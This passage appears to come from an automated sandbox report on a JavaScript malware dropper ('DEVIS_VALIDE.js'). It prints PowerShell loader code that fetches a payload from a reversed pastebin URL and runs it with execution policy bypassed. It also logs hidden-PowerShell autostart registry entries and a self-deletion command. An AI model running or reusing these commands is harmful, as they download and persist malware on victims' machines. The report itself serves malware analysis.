'[System.AppDomain]::CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''ClassLibrary3.Class1'' ).GetM' ;$MODRg += 'ethod( ''prFVI'' ).Invoke( $null , [object[]] ( ''k7NnMCPC/war/moc.nibetsap//:sptth'' , ''C:\Users\user\Desktop\DEVIS_VALIDE.js'' , ''D DDRegAsm'' ) );';$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1') ;$MODRg \| Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;};"			Jump to behavior

Boot Survival

Creates autostart registry keys with suspicious values (likely registry only malware)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_lme cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_lme cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nzm cmd.exe /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -command ". 'C:\Users\user\AppData\LocalLow\Daft Sytem\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\Program Rules NVIDEO\jamie.ps1' ";exit

Creates multiple autostart registry keys

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nzm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_lme

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_lme
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_lme
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_lme
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Update Drivers NVIDEO_lme
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nzm
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Update Drivers NVIDEO_nzm

Hooking and other Techniques for Hiding and Protection

Loading BitLocker PowerShell Module

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior

Self deletion via cmd or bat file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: cmd.exe /c del "C:\Users\user\Desktop\DEVIS_VALIDE.js"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: cmd.exe /c del "C:\Users\user\Desktop\DEVIS_VALIDE.js"			Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\1F61296E2D13B1021028 B6D8BCCDF123CEAC6B9642AD3500D4E0B3D30B9C9DD2D29499D38C02BD8F9982

Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
